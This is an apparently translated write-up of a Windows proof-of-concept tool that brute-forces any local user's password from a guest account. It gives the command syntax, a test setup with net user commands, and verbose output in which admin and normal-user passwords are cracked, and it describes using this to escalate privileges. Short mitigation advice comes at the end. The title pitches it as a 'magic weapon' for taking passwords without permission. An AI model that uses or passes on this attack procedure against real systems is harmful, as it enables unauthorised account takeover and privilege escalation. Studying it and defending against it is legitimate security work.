Magic weapon - Get any Microsoft Windows user password without any permission.
Project address: https://github.com/DarkCoderSc/win-brute-logon
Targets: Windows XP to latest Windows 10 version (1909)
Usage
glossary file
WinBruteLogon.exe -u <username> -w <wordlist_file>
standard input vocabulary
type <wordlist_file> | WinBruteLogon.exe -u <username> -
Introduction
This PoC is more of what I call a critical weakness in the Microsoft Windows authentication mechanism than a vulnerability.
The biggest problem has to do with the lack of permissions needed to perform such actions.
In fact, with the guest account (the most restricted account on Microsoft Windows), you can crack the password of any available local user.
Find out which users exist using the command: net user
This PoC uses multithreading to speed up the process and supports 32-bit and 64-bit.
PoC test scenario (using guest account)
tested on Windows 10
Install and configure a newly updated Windows 10 virtual or physical machine.
In my case the full Windows version is: 1909 (OS Build 18363.778)
Log in as an administrator and let's create two different accounts: an administrator and a normal user. Both users are local users.
/!\ IMPORTANT NOTE: I used the Guest account in the demo, but this PoC is not limited to the Guest account, it works with any account/group (guest user/regular user/admin user etc...)
Create a new admin user
net user darkcodersc /add
net user darkcodersc trousers
net localgroup administrators darkcodersc /add
create common user
net user HackMe /add
net user HackMe ozlq6qwm
Create a new guest account
net user GuestUser /add
net localgroup users GuestUser /delete
net localgroup guests GuestUser /add
Start the attack
Log off from the administrator account or restart the computer and log on to the guest account.
Put the PoC executable anywhere you have access as a guest user.
用法 :WinBruteLogon.exe -v -u -w <wordlist_file>
-v is optional, it sets verbose mode.
By default, the domain name is the value specified by the %USERDOMAIN% env var. You can specify a custom name with option -d
Crack the first user: (darkcodersc admin)
prompt(guest)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt
Wait a few seconds to see the following results:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=2260, handle=364
[INFO] New "TWorker" Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.
[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
Hack the second user: (HackMe normal user)
prompt(guest)>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt
Wait a few seconds to see the following results:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=5748, handle=336
[INFO] New "TWorker" Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.
[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
If you gain access to a low-privileged user, you can crack the password of a higher-privileged user and elevate your privileges.
repair:
Disable the guest account (if present).
Application whitelist.
Follow the guidelines to create and keep passwords strong. Apply this to all users.
Implement a security lockout policy (default does not exist)
Open secpol.msc then go to Account Policies > and edit the value Account Lockout Policy with the desired value between (1 to 999). Account lockout threshold
The value represents the number of possible attempts before locking.
/!\ LockDown Policy does not apply to administrator accounts. At this point, the best protection for the administrator account (if enabled) is to have a very complex password.